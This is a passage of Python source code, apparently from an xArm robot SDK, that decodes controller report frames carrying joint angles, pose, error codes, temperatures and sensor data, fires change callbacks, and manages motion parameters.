'temperatures': self.temperatures
}, name='temperature_changed')
def _report_count_changed_callback(self):
self.__report_callback(self.REPORT_COUNT_CHANGED_ID, {'count': self._count}, name='count_changed')
def _report_iden_progress_changed_callback(self):
self.__report_callback(self.REPORT_IDEN_PROGRESS_CHANGED_ID, {'progress': self._iden_progress}, name='iden_progress_changed')
def _report_location_callback(self):
if self.REPORT_LOCATION_ID in self._report_callbacks.keys():
for item in self._report_callbacks[self.REPORT_LOCATION_ID]:
callback = item['callback']
ret = {}
if item['cartesian']:
ret['cartesian'] = self.position.copy()
if item['joints']:
ret['joints'] = self.angles.copy()
self._run_callback(callback, ret, name='location')
def _report_callback(self):
if self.REPORT_ID in self._report_callbacks.keys():
for item in self._report_callbacks[self.REPORT_ID]:
callback = item['callback']
ret = {}
if item['cartesian']:
ret['cartesian'] = self.position.copy()
if item['joints']:
ret['joints'] = self.angles.copy()
if item['error_code']:
ret['error_code'] = self._error_code
if item['warn_code']:
ret['warn_code'] = self._warn_code
if item['state']:
ret['state'] = self._state
if item['mtable']:
mtable = [bool(i) for i in self._arm_motor_enable_states]
ret['mtable'] = mtable.copy()
if item['mtbrake']:
mtbrake = [bool(i) for i in self._arm_motor_brake_states]
ret['mtbrake'] = mtbrake.copy()
if item['cmdnum']:
ret['cmdnum'] = self._cmd_num
self._run_callback(callback, ret, name='report')
def _report_thread_handle(self):
main_socket_connected = self._stream and self._stream.connected
report_socket_connected = self._stream_report and self._stream_report.connected
while self.connected:
try:
if not self._stream_report or not self._stream_report.connected:
self.get_err_warn_code()
if report_socket_connected:
report_socket_connected = False
self._report_connect_changed_callback(main_socket_connected, report_socket_connected)
self._connect_report()
continue
if not report_socket_connected:
report_socket_connected = True
self._report_connect_changed_callback(main_socket_connected, report_socket_connected)
recv_data = self._stream_report.read(1)
if recv_data != -1:
size = convert.bytes_to_u32(recv_data)
if self._is_old_protocol and size > 256:
self._is_old_protocol = False
self._handle_report_data(recv_data)
else:
if self.connected:
code, err_warn = self.get_err_warn_code()
if code == -1 or code == 3:
break
if not self.connected:
break
elif not self._stream_report or not self._stream_report.connected:
self._connect_report()
except Exception as e:
logger.error(e)
if self.connected:
code, err_warn = self.get_err_warn_code()
if code == -1 or code == 3:
break
if not self.connected:
break
if not self._stream_report or not self._stream_report.connected:
self._connect_report()
time.sleep(0.001)
self.disconnect()
def _handle_report_data(self, data):
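        # Dispatch one report frame to the parser matching the configured
        # report type ('normal', 'rich' or 'real') and the protocol
        # generation; each nested handler below decodes a single frame layout.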
def __handle_report_normal_old(rx_data):
# print('length:', convert.bytes_to_u32(rx_data[0:4]))
state, mtbrake, mtable, error_code, warn_code = rx_data[4:9]
angles = convert.bytes_to_fp32s(rx_data[9:7 * 4 + 9], 7)
pose = convert.bytes_to_fp32s(rx_data[37:6 * 4 + 37], 6)
cmd_num = convert.bytes_to_u16(rx_data[61:63])
pose_offset = convert.bytes_to_fp32s(rx_data[63:6 * 4 + 63], 6)
if error_code != self._error_code or warn_code != self._warn_code:
if error_code != self._error_code:
self._error_code = error_code
if self._error_code != 0:
pretty_print('Error, code: {}'.format(self._error_code), color='red')
else:
                        pretty_print('Error cleared', color='blue')
if warn_code != self._warn_code:
self._warn_code = warn_code
if self._warn_code != 0:
pretty_print('Warn, code: {}'.format(self._warn_code), color='yellow')
else:
                        pretty_print('Warning cleared', color='blue')
self._report_error_warn_changed_callback()
logger.info('OnReport -> err={}, warn={}, state={}, cmdnum={}, mtbrake={}, mtable={}'.format(
error_code, warn_code, state, cmd_num, mtbrake, mtable
))
elif not self._only_report_err_warn_changed:
self._report_error_warn_changed_callback()
if cmd_num != self._cmd_num:
self._cmd_num = cmd_num
self._report_cmdnum_changed_callback()
if state != self._state:
self._state = state
self._report_state_changed_callback()
mtbrake = [mtbrake & 0x01, mtbrake >> 1 & 0x01, mtbrake >> 2 & 0x01, mtbrake >> 3 & 0x01,
mtbrake >> 4 & 0x01, mtbrake >> 5 & 0x01, mtbrake >> 6 & 0x01, mtbrake >> 7 & 0x01]
mtable = [mtable & 0x01, mtable >> 1 & 0x01, mtable >> 2 & 0x01, mtable >> 3 & 0x01,
mtable >> 4 & 0x01, mtable >> 5 & 0x01, mtable >> 6 & 0x01, mtable >> 7 & 0x01]
if mtbrake != self._arm_motor_brake_states or mtable != self._arm_motor_enable_states:
self._arm_motor_enable_states = mtable
self._arm_motor_brake_states = mtbrake
self._report_mtable_mtbrake_changed_callback()
if not self._is_first_report:
if state in [4, 5] or not all([bool(item[0] & item[1]) for item in zip(mtbrake, mtable)][:self.axis]):
# if self._is_ready:
# pretty_print('[report], xArm is not ready to move', color='red')
self._is_ready = False
else:
# if not self._is_ready:
# pretty_print('[report], xArm is ready to move', color='green')
self._is_ready = True
else:
self._is_ready = False
self._is_first_report = False
if not self._is_ready:
self._sleep_finish_time = 0
reset_tgpio_params = False
reset_linear_track_params = False
if 0 < error_code <= 17:
reset_tgpio_params = True
reset_linear_track_params = True
elif error_code in [19, 28]:
reset_tgpio_params = True
elif error_code == 111:
reset_linear_track_params = True
if reset_tgpio_params:
self.modbus_baud = -1
self.robotiq_is_activated = False
                self.gripper_is_enabled = False
                self.bio_gripper_is_enabled = False
                self.bio_gripper_speed = 0
                self.gripper_speed = 0
self.gripper_version_numbers = [-1, -1, -1]
if reset_linear_track_params:
self.linear_track_baud = -1
self.linear_track_is_enabled = False
self.linear_track_speed = 1
# if error_code in [1, 10, 11, 12, 13, 14, 15, 16, 17, 19, 28]:
# self.modbus_baud = -1
# self.robotiq_is_activated = False
# self.gripper_is_enabled = False
# self.bio_gripper_is_enabled = False
# self.bio_gripper_speed = 0
# self.gripper_is_enabled = False
# self.gripper_speed = 0
# self.gripper_version_numbers = [-1, -1, -1]
# self.linear_track_is_enabled = False
# self.linear_track_speed = 0
self._error_code = error_code
self._warn_code = warn_code
self.arm_cmd.has_err_warn = error_code != 0 or warn_code != 0
_state = self._state
self._state = state
if self.state != 3 and (_state == 3 or self._pause_cnts > 0):
with self._pause_cond:
self._pause_cond.notifyAll()
self._cmd_num = cmd_num
self._arm_motor_brake_states = mtbrake
self._arm_motor_enable_states = mtable
update_time = time.time()
self._last_update_cmdnum_time = update_time
self._last_update_state_time = update_time
self._last_update_err_time = update_time
for i in range(len(pose)):
pose[i] = filter_invaild_number(pose[i], 3 if i < 3 else 6, default=self._position[i])
for i in range(len(angles)):
angles[i] = filter_invaild_number(angles[i], 6, default=self._angles[i])
for i in range(len(pose_offset)):
pose_offset[i] = filter_invaild_number(pose_offset[i], 3 if i < 3 else 6, default=self._position_offset[i])
            if not (0 < self._error_code <= 17):
                self._position = pose
                self._angles = angles
                self._position_offset = pose_offset
self._report_location_callback()
self._report_callback()
if not self._is_sync and self._error_code == 0 and self._state not in [4, 5]:
self._sync()
self._is_sync = True
def __handle_report_rich_old(rx_data):
report_time = time.time()
interval = report_time - self._last_report_time
self._max_report_interval = max(self._max_report_interval, interval)
self._last_report_time = report_time
            __handle_report_normal_old(rx_data)
(self._arm_type,
arm_axis,
self._arm_master_id,
self._arm_slave_id,
self._arm_motor_tid,
self._arm_motor_fid) = rx_data[87:93]
if 7 >= arm_axis >= 5:
self._arm_axis = arm_axis
if self._arm_type == 5:
self._arm_axis = 5
elif self._arm_type == 6:
self._arm_axis = 6
elif self._arm_type == 3:
self._arm_axis = 7
ver_msg = rx_data[93:122]
# self._version = str(ver_msg, 'utf-8')
trs_msg = convert.bytes_to_fp32s(rx_data[123:143], 5)
# trs_msg = [i[0] for i in trs_msg]
(self._tcp_jerk,
self._min_tcp_acc,
self._max_tcp_acc,
self._min_tcp_speed,
self._max_tcp_speed) = trs_msg
# print('tcp_jerk: {}, min_acc: {}, max_acc: {}, min_speed: {}, max_speed: {}'.format(
# self._tcp_jerk, self._min_tcp_acc, self._max_tcp_acc, self._min_tcp_speed, self._max_tcp_speed
# ))
p2p_msg = convert.bytes_to_fp32s(rx_data[143:163], 5)
# p2p_msg = [i[0] for i in p2p_msg]
(self._joint_jerk,
self._min_joint_acc,
self._max_joint_acc,
self._min_joint_speed,
self._max_joint_speed) = p2p_msg
# print('joint_jerk: {}, min_acc: {}, max_acc: {}, min_speed: {}, max_speed: {}'.format(
# self._joint_jerk, self._min_joint_acc, self._max_joint_acc,
# self._min_joint_speed, self._max_joint_speed
# ))
rot_msg = convert.bytes_to_fp32s(rx_data[163:171], 2)
# rot_msg = [i[0] for i in rot_msg]
self._rot_jerk, self._max_rot_acc = rot_msg
# print('rot_jerk: {}, mac_acc: {}'.format(self._rot_jerk, self._max_rot_acc))
sv3_msg = convert.bytes_to_u16s(rx_data[171:187], 8)
self._first_report_over = True
def __handle_report_real(rx_data):
state, mode = rx_data[4] & 0x0F, rx_data[4] >> 4
cmd_num = convert.bytes_to_u16(rx_data[5:7])
angles = convert.bytes_to_fp32s(rx_data[7:7 * 4 + 7], 7)
pose = convert.bytes_to_fp32s(rx_data[35:6 * 4 + 35], 6)
torque = convert.bytes_to_fp32s(rx_data[59:7 * 4 + 59], 7)
if cmd_num != self._cmd_num:
self._cmd_num = cmd_num
self._report_cmdnum_changed_callback()
if state != self._state:
self._state = state
self._report_state_changed_callback()
if state in [4, 5]:
self._is_ready = False
else:
self._is_ready = True
if mode != self._mode:
self._mode = mode
self._report_mode_changed_callback()
for i in range(len(pose)):
pose[i] = filter_invaild_number(pose[i], 3 if i < 3 else 6, default=self._position[i])
for i in range(len(angles)):
angles[i] = filter_invaild_number(angles[i], 6, default=self._angles[i])
            if not (0 < self._error_code <= 17):
                self._position = pose
                self._angles = angles
self._joints_torque = torque
self._report_location_callback()
self._report_callback()
if not self._is_sync and self._state not in [4, 5]:
self._sync()
self._is_sync = True
length = len(rx_data)
if length >= 135:
# FT_SENSOR
self._ft_ext_force = convert.bytes_to_fp32s(rx_data[87:111], 6)
self._ft_raw_force = convert.bytes_to_fp32s(rx_data[111:135], 6)
def __handle_report_normal(rx_data):
# print('length:', convert.bytes_to_u32(rx_data[0:4]), len(rx_data))
state, mode = rx_data[4] & 0x0F, rx_data[4] >> 4
# if state != self._state or mode != self._mode:
# print('mode: {}, state={}, time={}'.format(mode, state, time.time()))
cmd_num = convert.bytes_to_u16(rx_data[5:7])
angles = convert.bytes_to_fp32s(rx_data[7:7 * 4 + 7], 7)
pose = convert.bytes_to_fp32s(rx_data[35:6 * 4 + 35], 6)
torque = convert.bytes_to_fp32s(rx_data[59:7 * 4 + 59], 7)
mtbrake, mtable, error_code, warn_code = rx_data[87:91]
pose_offset = convert.bytes_to_fp32s(rx_data[91:6 * 4 + 91], 6)
tcp_load = convert.bytes_to_fp32s(rx_data[115:4 * 4 + 115], 4)
collis_sens, teach_sens = rx_data[131:133]
# if (collis_sens not in list(range(6)) or teach_sens not in list(range(6))) \
# and ((error_code != 0 and error_code not in controller_error_keys) or (warn_code != 0 and warn_code not in controller_warn_keys)):
# self._stream_report.close()
# logger.warn('ReportDataException: data={}'.format(rx_data))
# return
length = convert.bytes_to_u32(rx_data[0:4])
data_len = len(rx_data)
if (length != data_len and (length != 233 or data_len != 245)) or collis_sens not in list(range(6)) or teach_sens not in list(range(6)) \
or mode not in list(range(12)) or state not in list(range(10)):
self._stream_report.close()
                logger.warning('ReportDataException: length={}, data_len={}, '
'state={}, mode={}, collis_sens={}, teach_sens={}, '
'error_code={}, warn_code={}'.format(
length, data_len,
state, mode, collis_sens, teach_sens, error_code, warn_code
))
return
self._gravity_direction = convert.bytes_to_fp32s(rx_data[133:3*4 + 133], 3)
reset_tgpio_params = False
reset_linear_track_params = False
if 0 < error_code <= 17:
reset_tgpio_params = True
reset_linear_track_params = True
elif error_code in [19, 28]:
reset_tgpio_params = True
elif error_code == 111:
reset_linear_track_params = True
if reset_tgpio_params:
self.modbus_baud = -1
self.robotiq_is_activated = False
                self.gripper_is_enabled = False
                self.bio_gripper_is_enabled = False
                self.bio_gripper_speed = 0
                self.gripper_speed = 0
self.gripper_version_numbers = [-1, -1, -1]
if reset_linear_track_params:
self.linear_track_baud = -1
self.linear_track_is_enabled = False
self.linear_track_speed = 0
# if error_code in [1, 10, 11, 12, 13, 14, 15, 16, 17, 19, 28]:
# self.modbus_baud = -1
# self.robotiq_is_activated = False
# self.gripper_is_enabled = False
# self.bio_gripper_is_enabled = False
# self.bio_gripper_speed = -1
# self.gripper_speed = -1
# self.gripper_version_numbers = [-1, -1, -1]
# self.linear_track_is_enabled = False
# self.linear_track_speed = -1
# print('torque: {}'.format(torque))
# print('tcp_load: {}'.format(tcp_load))
# print('collis_sens: {}, teach_sens: {}'.format(collis_sens, teach_sens))
if error_code != self._error_code or warn_code != self._warn_code:
if error_code != self._error_code:
self._error_code = error_code
if self._error_code != 0:
pretty_print('ControllerError, code: {}'.format(self._error_code), color='red')
else:
                        pretty_print('ControllerError cleared', color='blue')
if warn_code != self._warn_code:
self._warn_code = warn_code
if self._warn_code != 0:
pretty_print('ControllerWarning, code: {}'.format(self._warn_code), color='yellow')
else:
                        pretty_print('ControllerWarning cleared', color='blue')
self._report_error_warn_changed_callback()
logger.info('OnReport -> err={}, warn={}, state={}, cmdnum={}, mtbrake={}, mtable={}, mode={}'.format(
error_code, warn_code, state, cmd_num, mtbrake, mtable, mode
))
elif not self._only_report_err_warn_changed:
self._report_error_warn_changed_callback()
if cmd_num != self._cmd_num:
self._cmd_num = cmd_num
self._report_cmdnum_changed_callback()
if state != self._state:
if not self._has_motion_cmd and self._state in [0, 1] and state not in [0, 1]:
self._need_sync = True
if self._state in [0, 1] and state not in [0, 1]:
self._has_motion_cmd = False
# print('old_state: {}, new_state: {}, has_motion_cmd={}, need_sync: {}'.format(self._state, state, self._has_motion_cmd, self._need_sync))
self._state = state
self._report_state_changed_callback()
if mode != self._mode:
self._mode = mode
self._report_mode_changed_callback()
mtbrake = [mtbrake & 0x01, mtbrake >> 1 & 0x01, mtbrake >> 2 & 0x01, mtbrake >> 3 & 0x01,
mtbrake >> 4 & 0x01, mtbrake >> 5 & 0x01, mtbrake >> 6 & 0x01, mtbrake >> 7 & 0x01]
mtable = [mtable & 0x01, mtable >> 1 & 0x01, mtable >> 2 & 0x01, mtable >> 3 & 0x01,
mtable >> 4 & 0x01, mtable >> 5 & 0x01, mtable >> 6 & 0x01, mtable >> 7 & 0x01]
if mtbrake != self._arm_motor_brake_states or mtable != self._arm_motor_enable_states:
self._arm_motor_enable_states = mtable
self._arm_motor_brake_states = mtbrake
self._report_mtable_mtbrake_changed_callback()
if not self._is_first_report:
if state in [4, 5] or not all([bool(item[0] & item[1]) for item in zip(mtbrake, mtable)][:self.axis]):
# if self._is_ready:
# pretty_print('[report], xArm is not ready to move', color='red')
self._is_ready = False
else:
# if not self._is_ready:
# pretty_print('[report], xArm is ready to move', color='green')
self._is_ready = True
else:
self._is_ready = False
self._is_first_report = False
if not self._is_ready:
self._sleep_finish_time = 0
self._error_code = error_code
self._warn_code = warn_code
self.arm_cmd.has_err_warn = error_code != 0 or warn_code != 0
_state = self._state
self._state = state
if self.state != 3 and (_state == 3 or self._pause_cnts > 0):
with self._pause_cond:
self._pause_cond.notifyAll()
self._mode = mode
self._cmd_num = cmd_num
update_time = time.time()
self._last_update_cmdnum_time = update_time
self._last_update_state_time = update_time
self._last_update_err_time = update_time
self._arm_motor_brake_states = mtbrake
self._arm_motor_enable_states = mtable
self._joints_torque = torque
if compare_version(self.version_number, (0, 2, 0)):
self._tcp_load = [float('{:.3f}'.format(tcp_load[0])), [float('{:.3f}'.format(i)) for i in tcp_load[1:]]]
else:
self._tcp_load = [float('{:.3f}'.format(tcp_load[0])), [float('{:.3f}'.format(i * 1000)) for i in tcp_load[1:]]]
self._collision_sensitivity = collis_sens
self._teach_sensitivity = teach_sens
for i in range(len(pose)):
pose[i] = filter_invaild_number(pose[i], 3 if i < 3 else 6, default=self._position[i])
for i in range(len(angles)):
angles[i] = filter_invaild_number(angles[i], 6, default=self._angles[i])
for i in range(len(pose_offset)):
pose_offset[i] = filter_invaild_number(pose_offset[i], 3 if i < 3 else 6, default=self._position_offset[i])
            if not (0 < self._error_code <= 17):
                self._position = pose
                self._angles = angles
                self._position_offset = pose_offset
self._report_location_callback()
self._report_callback()
if not self._is_sync and self._error_code == 0 and self._state not in [4, 5]:
self._sync()
self._is_sync = True
elif self._need_sync:
self._need_sync = False
# self._sync()
def __handle_report_rich(rx_data):
report_time = time.time()
interval = report_time - self._last_report_time
self._max_report_interval = max(self._max_report_interval, interval)
self._last_report_time = report_time
# print('interval={}, max_interval={}'.format(interval, self._max_report_interval))
__handle_report_normal(rx_data)
(self._arm_type,
arm_axis,
self._arm_master_id,
self._arm_slave_id,
self._arm_motor_tid,
self._arm_motor_fid) = rx_data[145:151]
if 7 >= arm_axis >= 5:
self._arm_axis = arm_axis
# self._version = str(rx_data[151:180], 'utf-8')
trs_msg = convert.bytes_to_fp32s(rx_data[181:201], 5)
# trs_msg = [i[0] for i in trs_msg]
(self._tcp_jerk,
self._min_tcp_acc,
self._max_tcp_acc,
self._min_tcp_speed,
self._max_tcp_speed) = trs_msg
# print('tcp_jerk: {}, min_acc: {}, max_acc: {}, min_speed: {}, max_speed: {}'.format(
# self._tcp_jerk, self._min_tcp_acc, self._max_tcp_acc, self._min_tcp_speed, self._max_tcp_speed
# ))
p2p_msg = convert.bytes_to_fp32s(rx_data[201:221], 5)
# p2p_msg = [i[0] for i in p2p_msg]
(self._joint_jerk,
self._min_joint_acc,
self._max_joint_acc,
self._min_joint_speed,
self._max_joint_speed) = p2p_msg
# print('joint_jerk: {}, min_acc: {}, max_acc: {}, min_speed: {}, max_speed: {}'.format(
# self._joint_jerk, self._min_joint_acc, self._max_joint_acc,
# self._min_joint_speed, self._max_joint_speed
# ))
rot_msg = convert.bytes_to_fp32s(rx_data[221:229], 2)
# rot_msg = [i[0] for i in rot_msg]
self._rot_jerk, self._max_rot_acc = rot_msg
# print('rot_jerk: {}, mac_acc: {}'.format(self._rot_jerk, self._max_rot_acc))
servo_codes = [val for val in rx_data[229:245]]
for i in range(self.axis):
if self._servo_codes[i][0] != servo_codes[i * 2] or self._servo_codes[i][1] != servo_codes[i * 2 + 1]:
print('servo_error_code, servo_id={}, status={}, code={}'.format(i + 1, servo_codes[i * 2], servo_codes[i * 2 + 1]))
self._servo_codes[i][0] = servo_codes[i * 2]
self._servo_codes[i][1] = servo_codes[i * 2 + 1]
self._first_report_over = True
# length = convert.bytes_to_u32(rx_data[0:4])
length = len(rx_data)
if length >= 252:
temperatures = list(map(int, rx_data[245:252]))
if temperatures != self.temperatures:
self._temperatures = temperatures
self._report_temperature_changed_callback()
if length >= 284:
speeds = convert.bytes_to_fp32s(rx_data[252:8 * 4 + 252], 8)
self._realtime_tcp_speed = speeds[0]
self._realtime_joint_speeds = speeds[1:]
# print(speeds[0], speeds[1:])
if length >= 288:
count = convert.bytes_to_u32(rx_data[284:288])
# print(count, rx_data[284:288])
if self._count != -1 and count != self._count:
self._count = count
self._report_count_changed_callback()
self._count = count
if length >= 312:
world_offset = convert.bytes_to_fp32s(rx_data[288:6 * 4 + 288], 6)
for i in range(len(world_offset)):
if i < 3:
world_offset[i] = float('{:.3f}'.format(world_offset[i]))
else:
world_offset[i] = float('{:.6f}'.format(world_offset[i]))
if math.inf not in world_offset and -math.inf not in world_offset and not (10 <= self._error_code <= 17):
self._world_offset = world_offset
if length >= 314:
self._cgpio_reset_enable, self._tgpio_reset_enable = rx_data[312:314]
if length >= 417:
self._is_simulation_robot = bool(rx_data[314])
self._is_collision_detection, self._collision_tool_type = rx_data[315:317]
self._collision_tool_params = convert.bytes_to_fp32s(rx_data[317:341], 6)
voltages = convert.bytes_to_u16s(rx_data[341:355], 7)
voltages = list(map(lambda x: x / 100, voltages))
self._voltages = voltages
currents = convert.bytes_to_fp32s(rx_data[355:383], 7)
self._currents = currents
cgpio_states = []
cgpio_states.extend(rx_data[383:385])
cgpio_states.extend(convert.bytes_to_u16s(rx_data[385:401], 8))
cgpio_states[6:10] = list(map(lambda x: x / 4095.0 * 10.0, cgpio_states[6:10]))
cgpio_states.append(list(map(int, rx_data[401:409])))
cgpio_states.append(list(map(int, rx_data[409:417])))
if self._control_box_type_is_1300 and length >= 433:
cgpio_states[-2].extend(list(map(int, rx_data[417:425])))
cgpio_states[-1].extend(list(map(int, rx_data[425:433])))
self._cgpio_states = cgpio_states
if length >= 481:
# FT_SENSOR
self._ft_ext_force = convert.bytes_to_fp32s(rx_data[433:457], 6)
self._ft_raw_force = convert.bytes_to_fp32s(rx_data[457:481], 6)
if length >= 482:
iden_progress = rx_data[481]
if iden_progress != self._iden_progress:
self._iden_progress = iden_progress
self._report_iden_progress_changed_callback()
if length >= 494:
pose_aa = convert.bytes_to_fp32s(rx_data[482:494], 3)
for i in range(len(pose_aa)):
pose_aa[i] = filter_invaild_number(pose_aa[i], 6, default=self._pose_aa[i])
self._pose_aa = self._position[:3] + pose_aa
try:
if self._report_type == 'real':
__handle_report_real(data)
elif self._report_type == 'rich':
if self._is_old_protocol:
__handle_report_rich_old(data)
else:
__handle_report_rich(data)
else:
if self._is_old_protocol:
__handle_report_normal_old(data)
else:
__handle_report_normal(data)
except Exception as e:
logger.error(e)
def _auto_get_report_thread(self):
logger.debug('get report thread start')
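        # Polling fallback used when no streaming report socket is available:
        # query cmdnum/state/error/angles/position over the command socket and
        # fire the same change callbacks the report socket would normally drive.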
while self.connected:
try:
cmd_num = self._cmd_num
state = self._state
error_code = self._error_code
warn_code = self._warn_code
self.get_cmdnum()
time.sleep(0.01)
self.get_state()
time.sleep(0.01)
self.get_err_warn_code()
time.sleep(0.01)
self.get_servo_angle()
time.sleep(0.01)
self.get_position()
if self.state != 3 and (state == 3 or self._pause_cnts > 0):
with self._pause_cond:
self._pause_cond.notifyAll()
if cmd_num != self._cmd_num:
self._report_cmdnum_changed_callback()
if state != self._state:
self._report_state_changed_callback()
if state in [4, 5]:
# if self._is_ready:
# pretty_print('[report], xArm is not ready to move', color='red')
self._sleep_finish_time = 0
self._is_ready = False
else:
# if not self._is_ready:
# pretty_print('[report], xArm is ready to move', color='green')
self._is_ready = True
if error_code != self._error_code or warn_code != self._warn_code:
self._report_error_warn_changed_callback()
elif not self._only_report_err_warn_changed and (self._error_code != 0 or self._warn_code != 0):
self._report_error_warn_changed_callback()
self._report_location_callback()
self._report_callback()
if self._cmd_num >= self._max_cmd_num:
time.sleep(1)
self._first_report_over = True
time.sleep(0.1)
except:
pass
self.disconnect()
logger.debug('get report thread stopped')
def _sync_tcp(self, index=None):
if not self._stream_report or not self._stream_report.connected:
self.get_position()
self.get_servo_angle()
self._last_angles = self._angles.copy()
if index is None:
self._last_position = self._position.copy()
elif isinstance(index, int) and 0 <= index < 6:
self._last_position[index] = self._position[index]
# print('=============sync_tcp: index={}'.format(index))
def _sync_joints(self, index=None):
if not self._stream_report or not self._stream_report.connected:
self.get_position()
self.get_servo_angle()
self._last_position = self._position.copy()
if index is None:
self._last_angles = self._angles.copy()
elif isinstance(index, int) and 0 <= index < 7:
self._last_angles[index] = self._angles[index]
# print('=============sync_joint: index={}'.format(index))
def _sync(self):
if not self._stream_report or not self._stream_report.connected:
self.get_position()
self.get_servo_angle()
self._last_position = self._position.copy()
self._last_angles = self._angles.copy()
# print('=============sync_all')
def _set_params(self, **kwargs):
is_radian = kwargs.get('is_radian', self._default_is_radian)
if 'X' in kwargs and isinstance(kwargs['X'], (int, float)):
self._last_position[0] = kwargs.get('X')
if 'Y' in kwargs and isinstance(kwargs['Y'], (int, float)):
self._last_position[1] = kwargs.get('Y')
if 'Z' in kwargs and isinstance(kwargs['Z'], (int, float)):
self._last_position[2] = kwargs.get('Z')
if 'A' in kwargs and isinstance(kwargs['A'], (int, float)):
self._last_position[3] = kwargs.get('A') if is_radian else math.radians(kwargs.get('A'))
if 'B' in kwargs and isinstance(kwargs['B'], (int, float)):
self._last_position[4] = kwargs.get('B') if is_radian else math.radians(kwargs.get('B'))
if 'C' in kwargs and isinstance(kwargs['C'], (int, float)):
self._last_position[5] = kwargs.get('C') if is_radian else math.radians(kwargs.get('C'))
# if 'R' in kwargs and isinstance(kwargs['R'], (int, float)):
# self._last_position[6] = kwargs.get('R')
if 'I' in kwargs and isinstance(kwargs['I'], (int, float)):
self._last_angles[0] = kwargs.get('I') if is_radian else math.radians(kwargs.get('I'))
if 'J' in kwargs and isinstance(kwargs['J'], (int, float)):
self._last_angles[1] = kwargs.get('J') if is_radian else math.radians(kwargs.get('J'))
if 'K' in kwargs and isinstance(kwargs['K'], (int, float)):
self._last_angles[2] = kwargs.get('K') if is_radian else math.radians(kwargs.get('K'))
if 'L' in kwargs and isinstance(kwargs['L'], (int, float)):
self._last_angles[3] = kwargs.get('L') if is_radian else math.radians(kwargs.get('L'))
if 'M' in kwargs and isinstance(kwargs['M'], (int, float)):
self._last_angles[4] = kwargs.get('M') if is_radian else math.radians(kwargs.get('M'))
if 'N' in kwargs and isinstance(kwargs['N'], (int, float)):
self._last_angles[5] = kwargs.get('N') if is_radian else math.radians(kwargs.get('N'))
if 'O' in kwargs and isinstance(kwargs['O'], (int, float)):
self._last_angles[6] = kwargs.get('O') if is_radian else math.radians(kwargs.get('O'))
if 'F' in kwargs and isinstance(kwargs['F'], (int, float)):
self._last_tcp_speed = kwargs.get('F')
self._last_tcp_speed = min(max(self._last_tcp_speed, self._min_tcp_speed), self._max_tcp_speed)
if 'Q' in kwargs and isinstance(kwargs['Q'], (int, float)):
self._last_tcp_acc = kwargs.get('Q')
self._last_tcp_acc = min(max(self._last_tcp_acc, self._min_tcp_acc), self._max_tcp_acc)
if 'F2' in kwargs and isinstance(kwargs['F2'], (int, float)):
self._last_joint_speed = kwargs.get('F2')
if not is_radian:
self._last_joint_speed = math.radians(self._last_joint_speed)
self._last_joint_speed = min(max(self._last_joint_speed, self._min_joint_speed), self._max_joint_speed)
if 'Q2' in kwargs and isinstance(kwargs['Q2'], (int, float)):
self._last_joint_acc = kwargs.get('Q2')
if not is_radian:
self._last_joint_acc = math.radians(self._last_joint_acc)
self._last_joint_acc = min(max(self._last_joint_acc, self._min_joint_acc), self._max_joint_acc)
if 'T' in kwargs and isinstance(kwargs['T'], (int, float)):
self._mvtime = kwargs.get('T')
if 'LIMIT_VELO' in kwargs and isinstance(kwargs['LIMIT_VELO'], (list, tuple)) \
and len(kwargs['LIMIT_VELO']) == 2 and isinstance(kwargs['LIMIT_VELO'][0], (int, float)) \
and isinstance(kwargs['LIMIT_VELO'][1], (int, float)) \
and kwargs['LIMIT_VELO'][0] <= kwargs['LIMIT_VELO'][1]:
self._min_tcp_speed, self._max_tcp_speed = kwargs.get('LIMIT_VELO')
if 'LIMIT_ACC' in kwargs and isinstance(kwargs['LIMIT_ACC'], (list, tuple)) \
and len(kwargs['LIMIT_ACC']) == 2 and isinstance(kwargs['LIMIT_ACC'][0], (int, float)) \
and isinstance(kwargs['LIMIT_ACC'][1], (int, float)) \
and kwargs['LIMIT_ACC'][0] <= kwargs['LIMIT_ACC'][1]:
self._min_tcp_acc, self._max_tcp_acc = kwargs.get('LIMIT_ACC')
def _get_params(self, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
if is_radian:
return {
'lastPosition': self._last_position,
'lastAngles': self._last_angles,
'mvvelo': self._last_tcp_speed,
'mvacc': self._last_tcp_acc,
'tcpJerk': self._tcp_jerk,
'jointJerk': self._joint_jerk,
'angle_mvvelo': self._last_joint_speed,
'angle_mvacc': self._last_joint_acc,
'mvtime': self._mvtime,
'LIMIT_VELO': [self._min_tcp_speed, self._max_tcp_speed],
'LIMIT_ACC': [self._min_tcp_acc, self._max_tcp_acc],
'LIMIT_ANGLE_VELO': [self._min_joint_speed, self._max_joint_speed],
'LIMIT_ANGLE_ACC': [self._min_joint_acc, self._max_joint_acc],
}
else:
return {
'lastPosition': [math.degrees(self._last_position[i]) if 2 < i < 6 else self._last_position[i] for i in range(len(self._last_position))],
'lastAngles': [math.degrees(angle) for angle in self._last_angles],
'mvvelo': round(self._last_tcp_speed),
'mvacc': round(self._last_tcp_acc),
'tcpJerk': round(self._tcp_jerk),
'jointJerk': round(math.degrees(self._joint_jerk)),
'angle_mvvelo': round(math.degrees(self._last_joint_speed)),
'angle_mvacc': round(math.degrees(self._last_joint_acc)),
'mvtime': self._mvtime,
'LIMIT_VELO': list(map(round, [self._min_tcp_speed, self._max_tcp_speed])),
'LIMIT_ACC': list(map(round, [self._min_tcp_acc, self._max_tcp_acc])),
'LIMIT_ANGLE_VELO': list(map(round, [math.degrees(self._min_joint_speed), math.degrees(self._max_joint_speed)])),
'LIMIT_ANGLE_ACC': list(map(round, [math.degrees(self._min_joint_acc), math.degrees(self._max_joint_acc)])),
}
def _check_code(self, code, is_move_cmd=False):
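        # Normalize protocol return codes: warning/error/not-ready codes are
        # treated as success for ordinary commands, while motion commands
        # additionally require the controller to report a ready state.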
if is_move_cmd:
if code in [0, XCONF.UxbusState.WAR_CODE]:
if self.arm_cmd.state_is_ready:
return 0
else:
return XCONF.UxbusState.STATE_NOT_READY
else:
return code
# return 0 if code in [0, XCONF.UxbusState.WAR_CODE] and self.arm_cmd.state_is_ready else XCONF.UxbusState.STATE_NOT_READY if not self.arm_cmd.state_is_ready else code
else:
return 0 if code in [0, XCONF.UxbusState.ERR_CODE, XCONF.UxbusState.WAR_CODE, XCONF.UxbusState.STATE_NOT_READY] else code
def _check_mode_is_correct(self, mode, timeout=1):
if self._enable_report and self._stream_type == 'socket':
cnt = int(10 * timeout)
while cnt > 0 and self.mode != mode:
time.sleep(0.1)
cnt -= 1
if self.mode != mode:
return False
return True
def wait_until_cmdnum_lt_max(self):
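        # Block while the controller's queued command count is at its limit,
        # bailing out early on disconnect, error, not-ready state or emergency stop.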
